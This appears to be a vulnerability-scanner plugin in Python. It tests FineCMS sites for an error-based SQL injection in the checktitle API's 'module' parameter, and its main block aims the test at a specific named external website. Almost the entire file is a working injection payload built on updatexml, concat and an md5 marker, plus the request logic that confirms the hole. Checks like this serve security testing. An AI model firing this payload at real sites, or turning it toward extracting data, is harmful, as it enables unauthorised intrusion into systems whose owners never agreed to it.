#!/usr/bin/env python
#-*- encoding:utf-8 -*-
#ref https://www.t00ls.net/thread-44262-1-1.html
# https://xianzhi.aliyun.com/forum/topic/2050

import random
def assign(service, arg):
    if service == "finecms":
        return True, arg


def audit(arg):
    payload = arg + 'index.php?s=member&c=api&m=checktitle&id=13&title=123&module=news,(select (updatexml(1,concat(0x5e24,(md5("xq17")),0x5e24),1)))c,admin'
    code, head, body, redirect, log = hackhttp.http(payload)
    if '5ce1f216b70ef3cd03b8db6988aa1b' in body:
        security_hole("SQL Inject:" + payload)

                        

if __name__ == '__main__':
    from dummy import *
    audit(assign('finecms', 'http://www.wfeng.net/')[1]) 
